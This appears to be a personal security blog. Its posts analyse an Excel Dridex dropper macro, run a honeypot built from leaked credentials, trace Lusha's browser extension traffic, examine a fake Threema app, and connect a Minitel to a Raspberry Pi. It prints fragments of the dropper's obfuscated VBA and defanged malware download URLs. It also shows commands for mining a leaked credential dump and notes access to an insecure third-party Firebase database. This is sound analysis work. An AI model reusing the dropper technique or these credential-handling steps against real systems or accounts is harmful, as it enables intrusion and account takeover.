Thursday, July 29, 2021

Analyzing an Excel Dridex Dropper

Summer 2021 has been rather rainy 🌧 so far... what better pastime than analyzing some malware? As an example we'll be using the maldoc sample 80fa4862d3d5ffe4a9d472f42e03a59874e76257c6e25c74de83b236f8f99777 which is provided for download from MalwareBazaar.

This maldoc sample is an .xlsm file, an Excel file based on the Office Open XML Format (OOXML) introduced with Microsoft Office 2007. The m denotes that the file includes macros, which of course will contain the malicious code. Since macros are disabled by default for untrusted sources, the document contains a notice asking the viewer to enable them – a common social engineering technique allowing the malicious code to execute on the system.

Let's inspect the contents of the macros using Didier Stevens' olevba:

We can see that the document contains a rather short VBA macro. It consists of a single subroutine called WorkBook_Open(), which will be executed when the file is opened (or as soon as macros are enabled). As obfuscation strategy the code contains many references to cells in the current worksheet. The values of these cells are assigned to a number of misleading variables names, which will be concatenated to produce a payload.

In order to inspect the worksheet cells, I uploaded the document to Google Docs. The lower part of the worksheet contains a large region of decimal numbers and also some strings like "mshta" or "Wscript.Shell" in cells scattered across the document, all of which are off-screen so that they aren't apparent at first sight.

 

Let's now dive into the VBA code. The first line refers to an environment variable and appends a string to it:
 
getTickLabelPositionNextToAxis9686 = Environ(Cells(170, 211)) & Cells(51, 76)
 
We can retrieve the values %ALLUSERSPROFILE% and the string \getAreaStacked1005705.sct from the corresponding cells HC170 and BX51, resulting in the file path C:\ProgramData\getAreaStacked1005705.sct stored into variable getTickLabelPositionNextToAxis9686:


Next, the worksheet Sheet1 is accessed (cell HI62) and the range B158:BP338 is selected from it (taken from cell HY70).

For Each getDColumnClustered1919 In ActiveWorkbook.Sheets(CStr(Cells(62, 217))).Range(CStr(Cells(70, 233)))
  getExcel97959228 = getExcel97959228 & Chr(Round(getDColumnClustered1919.Value))
Next getDColumnClustered1919

From this code we can see that each value in the range B158:BP338 corresponds to an ASCII character originating from its integer part. It was pretty straightforward to reproduce this decoding routine in Google Docs using Apps Script. The result is a payload of type HTML Application (HTA), which can itself execute embedded code, as we will see later.

Next, the HTA payload will be stored on disk using the path determined before (C:\ProgramData\getAreaStacked1005705.sct):

Open getTickLabelPositionNextToAxis9686 For Output As #1
Print #1, getExcel97959228
Close #1

Finally, the HTA payload will be invoked by using an instance of the Windows Scripting Host (Wscript.Shell.Exec), as taken from cell BI156:


With CreateObject(Cells(156, 61))
    .Exec Cells(64, 233) & getTickLabelPositionNextToAxis9686
End With

This in turn will create the mshta.exe process to interpret and execute the HTA file as can be see in this execution of the malware in app.any.run:

The HTA file contains a VBscript element from which we can see a list of download URLs for the second stage:

It will use a MSXML2.ServerXMLHTTP.6.0 instance with a user-agent value of "qPowerTalk" to download a DLL payload on C:\ProgramData\qMillions.dll (688bc9341860e2f04f307f162f71a628896bc6ca9fa200be54eee05a4b69cb72). The payload will get executed using rundll32.exe with entry point D2D1CreateFactory.


As we can see, this second stage sample has been classified as Dridex by several vendors:


Indicators

Files:
  • 80fa4862d3d5ffe4a9d472f42e03a59874e76257c6e25c74de83b236f8f99777 (maldoc)
  • 688bc9341860e2f04f307f162f71a628896bc6ca9fa200be54eee05a4b69cb72 (stage2)

Download URLs:

  • hxxp://docusignupdates[.]com:8088/files/icon_psn98.png
  • hxxp://azuredocs[.]org:8088/css/avatar_xgaf8d.png
  • hxxp://documentupdates[.]com:8088/templates/bacground_k8gad.png
  • hxxp://azuredocs[.]org:8088/javascript/empty_jquz.png
  • hxxp://mydocumentscloud[.]com:8088/app/button_umlnxz.png
  • hxxp://mydocumentscloud[.]xyz:8088/files/icon_psn98.png
  • hxxp://azuredocs[.]org:8088/js/empty_lfqcu.png
  • hxxp://mydocumentscloud[.]xyz:8088/uploads/empty_mtti.png
  • hxxp://docusignupdates[.]com:8088/javascript/bacground_ma8wvc.png
  • hxxp://docusignupdates[.]com:8088/uploads/icon_psn98.png

Sandbox runs:


Tuesday, April 6, 2021

Pwned in 604'800 seconds

Have you ever wondered if your internet accounts were hacked? One way to find out is checking your e-mail address on Troy Hunt's "Have I Been Pwned" website. Troy has been collecting leaked passwords from dozens of breached sites from over a decade. Was your e-mail address involved in a breach and was your password exposed? Then that password is burnt. You need to change it immediately and never use it again. Is this being paranoid? Let's figure out how long it would take for someone to actually hack it.

The idea is to setup a honey account on a popular platform, signing up with known leaked e-mail and password combination. First, we'll need access to one of leaked password dumps, which is not very hard to come by...

Exploit.in In late 2016, a huge list of email address and password pairs appeared in a "combo list" referred to as "Exploit.In". The list contained 593 million unique email addresses, many with multiple different passwords hacked from various online systems. The list was broadly circulated and used for "credential stuffing", that is attackers employ it in an attempt to identify other online systems where the account owner had reused their password.

Next we'll need to select one or several abandoned e-mail addresses. For this I decided to focus on the gmx.net FreeMail service, since it is rather convenient to check the availability of addresses.

Then let's retrieve all @gmx.ch addresses from the password dump:

grep -rhi '@gmx.ch:' Exploit.in | awk -F: '{print $1}' > gmx.txt

There are roughly 140k candidates. I used wfuzz to automate the availability check:

wfuzz -w gmx.txt -H "Authorization: Bearer qXeyJ..." -H "Content-Type: application/json" -H "X-CCGUID: e58d..." -H "User-Agent: hello" -u https://onereg-email-suggest.gmx.net/email-alias/availability -d '{"emailAddress": "FUZZ", "countryCode": "CH", "requestedEmailAddressProduct":"gmxnetFree"}' -s 2 -f results.txt --ss true

This endpoint's availability is rate limited, therefore it is necessary to throttle the requests (using -s 2). Nonetheless, this quickly provided a set of candidates.

Now let's register some accounts. I decided to opt for popular platforms, like Instragram, Ebay, etc. using the breached credentials. Now that the honeypots are setup, let's wait...

Within a week (at least) someone identified the breached credentials on Instagram, logged into the honey account and started doing weird stuff, e.g. changing the profile, adding lots of followers, essentially turning the account into a bot.


Here are some takeaways

  1. Use unique passwords for each and every account.
  2. You can't memorize so many passwords? Use a password manager.
  3. If possible, setup Multiple Factor Authentication (MFA).
  4. Subscribe to HIBP's breach notifications.


Thursday, February 6, 2020

Down the Rabbit Hole of Harvested Personal Data

In this blog post I will shine a light at dubious business practices around trading of personal data. I  describe by which technical means personal data is harvested at first, and how it is sold via intermediaries later on. Based on a recent experience of leaked personal data, I will track down my own mobile phone number

The story began when I received a contact request from a recruiter via Whatsapp messenger. I was all but happy about this aggressive tactic, to say the least. Therefore I decided to contact that Swiss based recruiting company (digitalent.ch) and asked them to inform me about their data source. Their CEO replied within hours and let me know that my number was acquired «from a publicly available directory called lusha.co».

lusha.co – the data scrapers

lusha.co is based in Tel-Aviv and was founded in 2016. Quoting their website, they «collect information concerning business profiles, including […] name, company name, job title, email address, phone numbers, business address, and social media links», which of course are sold for access. Unfortunately, only vague information is provided on their data sources: «Lusha collects information from publicly available sources and from its business partners which take part in building and improving the Lusha community.» We will soon see that the term publicly available sources is open to interpretation and that the contribution of their business partners is key for their success. As a company aggressively aspiring to grow (I counted 7 sales/marketing employees versus 4 engineers), they are constrained by data protection laws such as GDPR and CCPA for the respective European and American markets. They offer a contact for European citizens to exercise their differents rights under the GDPR. I am not a lawyer, but the phrasing sometimes does sound as if they weigh their interests pretty much over the regulations, e.g. «[…] please note that these rights are not absolute, and may be subject to our own legitimate interests and regulatory requirements» and «Lusha’s lawful basis for processing is its legitimate interest in providing its services to its users» ¯\_(ツ)_/¯

Anyhow, let's get to the inner workings of lusha.co. A free subscription is available with an offer of 5 credits per month, each credit allowing to retrieve data of one requested person. As a user, you are supposed to use a browser extension to integrate with LinkedIn when accessing user profiles on the platform. The extension is available for Chrome, Edge and Firefox; note that the extension is not recommended by Firefox.


For the dynamic analysis, I installed the Firefox extension directly from the Add-ons website. For a static analysis, there are two options: download the .xpi file (right click on the blue "+ Add to Firefox" button and select "Save as...") or retrieve it from the user profiles folder (on a mac: /Users/<username>/Library/ApplicationSupport/Firefox/Profiles/<profile>/extensions/<filename>.xpi).

File name: lusha_easily_find_b2b_contact_details-9.5.1-an+fx.xpi
SHA-256: 11e48be153a28adda35514e959844098f41d5606628c454efbcb7a5c683acab5

The .xpi file is just a ZIP archive containing the different HTML and Javascript artefacts used by the extension. The file manifest.json contains the permissions and URLs for content scripts. This is the code that will be injected in the pages when visiting the corresponding URLs, in this case LinkedIn and Salesforce.

{
  "manifest_version": 2,
  "short_name": "Lusha",
  "author": "Lusha",
  "description": "Lusha is the easiest way to find B2B contact information with just one click.",
  "version": "9.5.1",
  "name": "Lusha - Easily find B2B contact information",
  "content_scripts": [
    {
      "matches": [
        "https://dashboard.lusha.co/*",
        "https://*.linkedin.com/*",
        "https://*.salesforce.com/*"
      ],
      "exclude_matches": [
        "https://www.lusha.co/*",
        "https://www.salesforce.com/*",
        "https://*.lightning.force.com/*"
      ],
      "js": [
        "content.js",
        "assets.js"
      ],
      "run_at": "document_idle"
    }
  ],
  "permissions": [
    "tabs",
    "https://*.lusha.co/*",
    "storage"
  ],
  "optional_permissions": [
    "https://*.lightning.force.com/*"
  ]
...
  }
}

Being logged on to LinkedIn I visited my own profile to see if and what data lusha.co would provide:


A HTTP network trace using Burpsuite shows interesting behaviour as the entire HTML body is sent to lusha.co's backend servers, as LZ-compressed, base64-encoded payload in the "html" value with a total of 18 kB (HTTP headers and payload truncated for better readability):


POST /v2/search HTTP/1.1
Host: plugin-services.lusha.co


{"html":"PGRpdiBjbGFzcz0iZ2xvYmFsLWFsZXJ0IMwNLS15aWVsZM8UaXNFeHBhbmRlZCIgZGF0YS1
pZD0iY29va2llLXBvbGljeSI+PGxpLWljb27UY19fxRrSE8hvb25sb2FkIGxhenktxAplZCI+PC/HUj4
8cNZVbWVzc2FnZS1jb250ZW50Ij5UaGlzIHdlYnNpdGUgdXNlcyDmAKVzIHRvIGltcHJvdmUgc2Vydml
jZSBhbmQgxBJpZGUgdGFpbG9yZWQgYWRzLiBCeSB1c2luZyB0xFDETSwgeW91IGFncmVlxEvFGHVzZS4
gU2VlIG91ciA8YSBocmVmPSJodHRwczovL3d3dy5saW5rZWRpbi5jb20vbGVnYWwv7QE1P3Ryaz1wdWJ
saWNfcHJvZmlsZV/GIV/GIV9jbGlja+cBdHRyYWNraW5n5QDvcm9sLW5hbWU9It9A00B3aWzEPXZpZ2F
0ZT0iIj5DxTQgUMU0PC9hPi48L3A+PGJ1dHRvbiB0eXBlPSLGDSL2AYnIHf8AqOwAqGRpc21pc3MiIGF
yaWEtbGFiZWw9IkTHFf8CTcQaLS3HQvQCPMZVaGlkZGVuPSJ0cnVl7QJPL+YAsD48L2Rpdj48aGVhZGV
yyGvGDiI+PG5h6QMvbmF2Ij7pAeMv9AG4bmF2LcY7LWxvZ2/pASluYXZfX8QSLeQCDv8BI99T/wHHPHN
wYekBMsp4dGV4dCI+TOUCjEluPC/EJvEBYckv/wFI7gFIYT48c2VjdGnKSHNlYXJjaC1iYXLnAK9jdXJ
yZW50LccZ5gJNUEVPUExFIukCY9E9X19wbGFjZWhvbOQBmnNob3ctb24tbW9iaWxlIGhpZGXED2Rlc2t
0b3D/AVTuAVTHY3N3aXRjaGVyLW9wZW5lcu4ChuYE7CDGKyI+7AU47ACiZnVsbC3rAKciPkFudG9pbmU
gTmV1ZW5zY2h35AUzcucCZukCdcxP6ACHdGFic19fdHJpZ2dlci1hbmTFEvIBIc4wy33pARXmAST/ART
vARTMVu4A0u0CU9p+5wJkUGVvcGxl9wJizz5jYXJldC1kb3duLWZpbGxl/wYE/wFAxFTwAhjwARM+PGg
...
A6BCWzxbpCs9NRkFIU2xTVllETmZ0akRFanlNZmFLVnV6YmpZQ3hITOgA5M9XzQ1B5AcPb3Bl5gsq7wC
95Q2e7gNm6Qe1xQY=","url":"https://ch.linkedin.com/in/antoineneuenschwander","req
uest_id":"74924a15-ef0c-4bed-97a9-498831865d47","firstSearch":true}


By decompressing the payload, we see that the contents include data really only visible by logged on users:


$ node
Welcome to Node.js v13.7.0.
Type ".help" for more information.
> var LZUTF8 = require('lzutf8');
undefined
> var compressed = fs.readFileSync('html_payload_compressed.bin', 'utf8')
undefined
> LZUTF8.decompress(compressed, {inputEncoding: "Base64"});
...
' <div class="artdeco-hoverable-content__content artdeco-hovercard-content-container">\n' +
' <p>See and edit how you look to people who are not signed in, and find you through search engines (ex: Google, Bing).</p>\n' +
'\n' +
...


In a second request, we do get access to the "enriched" data corresponding to the displayed LinkedIn profile:


POST /v2/show HTTP/1.1
Host: plugin-services.lusha.co

{"request_id":"74924a15-ef0c-4bed-97a9-498831865d47"}


HTTP/1.1 201 Created
Date: Tue, 04 Feb 2020 20:59:39 GMT
Content-Type: application/json; charset=utf-8
Connection: close

{"request":{"phones":["+41 7X XXX XX XX","+41 5X XXX XX
XX"],"emails":[],"name":"Antoine
Neuenschwander","link":"https://ch.linkedin.com/in/antoineneuenschwander","platf
orm":"linkedin","contact":{"id":"42127f80-4791-11ea-a6c7-4fac905d8f3e","firstNam
e":"Antoine","lastName":"Neuenschwander","showDate":"2020-02-04T20:59:39.256Z","
lists":"all contacts"},"company":{"address":"Worblaufen, Bern,
Switzerland","categories":["Information
Technology","Telecommunications"],"description":"Swisscom, Switzerland’s
leading telecoms company and one of its leading IT companies, is headquartered
in
Ittigen.","domain":"swisscom.ch","employees":"+10,000","founded":"1998","logo":"
https://logo.lusha.co/a/4f4/4f479b5d-343e-49c2-822c-edd920333dd0.jpg","name":"Sw
isscom","social":{"facebook":{"url":"https://www.facebook.com/Swisscom"},"linked
in":{"url":"https://www.linkedin.com/company-beta/2715"},"twitter":{"url":"https
://twitter.com/swisscom_de"}},"website":"swisscom.ch"}},"user":{"email":"XXXXX",
"isOnBoarding":true},"trialExpired":false}


The lusha.co browser extension states the following regarding the type of data submitted to their backend and required to identify a user profile:


From my observations, not only «certain words (such as full name and company name)», rather entire user profile data is sent to lusha.co's servers. Also the data is not only sent when needed, i.e. when a user requests enriched data of a single, chosen LinkedIn profile, but for each and every visited profile. So this extension implements essentially a crawler that scrapes every single LinkedIn profile in private-view as the users' are browsing LinkedIn, which is actually a clear violation of LinkedIn's terms. So they are basically selling the data to the customers that are harvesting the data in the first place, brilliant!


Meanwhile, I contacted lusha.co for a GDPR request, to which they replied:
In order to process your request we need to identify your profile,
for that purpose the following information is needed:
First Name:
Last Name:
Company Name:
Nationality:
Public LinkedIn profile link:
Needless to say that this procedure is insufficient to properly identify a legitimate requestor. I am tempted to try and impersonate another person, but I will abstain from doing so. As a result of my request, lusha.co provided me with both my phone numbers, as already provided by my own lookup. They also mentioned the data origin: «The information above originates from a database maintained by Simpler Apps Inc ("Simpler").»

Interesting! From its description, Simpler is an app that replaces the standard dialing and contacts functions on Android smartphones. And unsurprisingly, the app requires access to the users' contacts as well as full network access. Now, what could've happened? I assume that my mobile phone numbers were harvested from an installation of this app from someone that must had me in his contacts. Perhaps I will try to investigate the Simpler app in a subsequent blog post...


edit - 20.02.2020: Nightwatch Cybersecurity wrote a follow-up blog post on the matter analysing the role of the Simpler app.


Thursday, January 23, 2020

Analysis of a Fake Threema App

A couple of days ago there were reports of an app on the Google Playstore, which seemed to impersonate the Threema messenger app. Threema is a Swiss secure messaging service that uses end-to-end encryption to provide privacy to their users.



In the past, several fake apps were already observed targeting Swiss brands, like e.g. Bluewin. In that case, the app's purpose was to steal user credentials (login/password) from users that inadvertently downloaded it from the wrong developer. A more detailed description on the modus operandi can be found in a blog post by SWITCH-CERT.




Unfortunately, I failed to take a screenshot of the app while it was still available on the Playstore and before it was taken down by Google. But I remember that the counter had already reached 100+ downloads. Currently the app can still be downloaded from alternative sites like e.g. apkpure.com, which mirror all available apps from the Google Playstore. Each app in the Google Playstore is identified by a string in the form of a reverse domain name, in this case: com.wa.threema.



From the app description, we can see that the app was first published on January 9th 2020, meaning the app was available for more than ten days before it was reported to the Google abuse team and eventually removed.



So I went ahead and downloaded the APK file for analysis. First, I launched the emulator provided with the Android Studio development environment, dragged the APK into the virtual device and launched it. Meanwhile, I also started Burp Suite and changed the proxy settings of the emulator in order to intercept the network traffic. Unfortunately, this didn't work as expected because most network communication was destined to Google domains, which are protected by certificate pinning in the app. Therefore, I didn't follow up on the dynamic analysis, although it did allow me to take a couple of screenshots and to better understand the application logic:




I then used the JADX decompiler to open the APK file and recover its source code and other resources. First step is to analyse the AndroidManifest.xml, which contains a listing of relevant activities, especially the one that's called after the app startup: ar.codeslu.plax.MainActivity.




Looking at the code, we can see that the app makes use of Google's Firebase services, especially its noSQL database component, and we can already see what kind of entities are persisted on the backend: Global.USERS, Global.CHATS, Global.GROUPS and Global.CALLS. Also, an encryption object is created, it is initialized with Global.keyE and Global.salt, which are actually hardcoded values found in the ar.codeslu.plax.global.Global class (funny but irrelevant for the rest of the analysis):


A glimpse at the string resources gives us information about the URLs used to connect to the Firebase database backend:


Thanks to Elliot Alderson's blog post on hacking the Donald Daters App, I learned how to access the insecure Firebase backend associated to the app, which of course contained all user, chat, group and call records, as defined in the MainActivity class. At the time of writing, the database contained 286 registered users, 15 chats and 8 calls.



Looking at the code, we can see that the app actually implements all functionality of a working messaging service, including audio and video calls. That's quite a lot of effort, assuming the app's intention is only phishing. Indeed, my assumption was that the app was attacking Threema's registration process, but I couldn't find evidence to back this claim. So what is this app intended for?

Based on the package name ar.codeslu.plax I figured that a similar app was being sold on a marketplace. And by that I mean you can actually buy the source code of the app for as less as 35 USD and customize it to offer your own chatting app on the Google Playstore:



It occurs you can even find free downloads of the code by googling somewhat:


There's also a more expensive license, that allows the buyer to charge its users and I assume that's the actual business model of the fake app:


By looking for other apps by the same developer (junemoney, saadmslout@gmail.com) we see almost a dozen other chatting apps that have all been released approx. the same time and that also impersonate other popular messaging services like Discord, TextNow or Zalo, for which he has even written a corresponding privacy policy (I guess that's mandatory if you want to publish apps on the Playstore).



So in conclusion, from my point of view, the fake app's intention is not to steal user credentials, rather trick people into downloading the wrong app and have them pay subscriptions for usage of the app. (Other ideas? leave me a comment)

Anyhow, such apps often slip through Google Playstore's "quality assurance" during publication and are then made available to everyone for download :-/ But since such apps clearly violate Google's Developer Policies, anyone can report them as being abusive. Either because they are malicious, as in the case of the phishing app, or either because they infringe the intellectual property rights of others. In which case being logged into your Google account, you can go to the app's Playstore page, scroll down and report the app based on one of the two described violations.



Indicators of Compromise:
Filename: Threema Private Messenger_v1.4.2_apkpure.com.apk
SHA-256: a5422bc7f09c22a877f580119027ed83c6ba7ac12ae6647808b2ffddfcab7124

Wednesday, September 21, 2016

36 15 Framboise



As a boy while visiting family in France, one of the things I was very excited about was the Minitel that everybody had at home. It was a very popular videotex network in the 80s and 90s providing a multitude of services unbelievably similar to today's online experience. This compilation of ads and news reports give a good feel of what the Minitel had to offer. Today, it is often considered as a precursor of the world wide web.

So, to satisfy my nostalgic feelings, I bought a Minitel on Ebay. Although the service was retired in 2012, there are still plenty of devices on sale with prices ranging from 20€ for the most common models (e.g. Minitel 1B TELIC) to several hundreds € for the earlier/rarer models. The device suffered some cracks in the shell from shipping, but fortunately it still works!

Although the service is discontinued, and even if not living in France, a Minitel can still be operated in useful ways. The Minitel is a so-called dumb-terminal. It is used to access services running on distant systems which are accessed via the telephone network. So the Minitel has an integrated modem. But it can also interface with local devices, via a serial port available on the back. There are plenty of blog posts explaining how to do this, just google for "minitel linux terminal". Since I'm also fond of Raspberry Pi, this is the mandatory I-hooked-a-Minitel-to-my-Raspberry-Pi blog post!



I won't delve into too many technical details about the serial port adaptation, since there are enough resources about it online, but let me just describe the challenges I faced. First of all, the Minitel expects a male 5 pin DIN connector, not the usual DE-9 to interface with the serial port. They call it "Prise Péri-Informatique". I used a conventional MIDI patch cable, cut it in half and resoldered the pins to match the Minitel TX and RX leads.



Also, since I didn't want to get my hands too dirty - although I should practice some more soldering - I used the bi-directional level converter from sparkfun to adapt the 3.3V TTL signal level from the Raspberry Pi to the 5-15V levels of the Minitel (and vice-versa). There are many blog posts explaining how to implement this using a simple circuit with a couple of resistors and transistors.



I took some time to analyze the signal with an oscilloscope and interpret the serial protocol. When no characters are transmitted, the idle level is high. The asynchronous transmission starts with the start bit (low), continues with the 7 bit ASCII character value (most significant bit first), an even parity bit and finally ends with a stop bit (high). From the measurement we can see that a symbol is transmitted in 208 microseconds. This value inverted corresponds to the baud rate of 4800 bps. In this case, the transmitted character was a lowercase 'e' (0b01100101 or 0x65).



Finally, the last challenge I encountered was the fact that Raspbian, the standard debian-based Linux distro for Raspberry Pi switched to systemd. Most blog posts still refer to /etc/inittab to install the serial getty. Under systemd, it's a bit tricky. Here's my configuration under /etc/systemd/system/serial-getty@ttyAMA0.service:

# This file is part of systemd.
#
# systemd is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.

[Unit]
Description=Serial Getty on %I
Documentation=man:agetty(8) man:systemd-getty-generator(8)
Documentation=http://0pointer.de/blog/projects/serial-console.html
BindsTo=dev-%i.device
After=dev-%i.device systemd-user-sessions.service plymouth-quit-wait.service
After=rc-local.service

# If additional gettys are spawned during boot then we should make
# sure that this is synchronized before getty.target, even though
# getty.target didn't actually pull it in.
Before=getty.target
IgnoreOnIsolate=yes

[Service]
ExecStart=-/sbin/agetty -c ttyAMA0 4800 m1b-x80
Type=idle
Restart=always
UtmpIdentifier=%I
TTYPath=/dev/%I
TTYReset=yes
TTYVHangup=yes
KillMode=process
IgnoreSIGPIPE=no
SendSIGHUP=yes

[Install]
WantedBy=getty.target


I also used the Minitel 1B terminfo file of Alexandre Montaron and installed it as follows:

$ tic mntl.ti -dir /etc/terminfo


Here a screenshot of the working system with the output of the top command:


10 years ago, I got a hand on the "Spécification Techniques d'Utilisation du Minitel 1B" (STUM), a 200 page specification of the Minitel and it's building components (modem, keyboard, screen, serial port) as well as the different modes of operation ("Standard Télétel" or "Standard Téléinformatique ASCII"). It has shown very helpful to understand the inner workings of the device.



Finally, here are some links you might want to check out if you want to find out more about Minitel: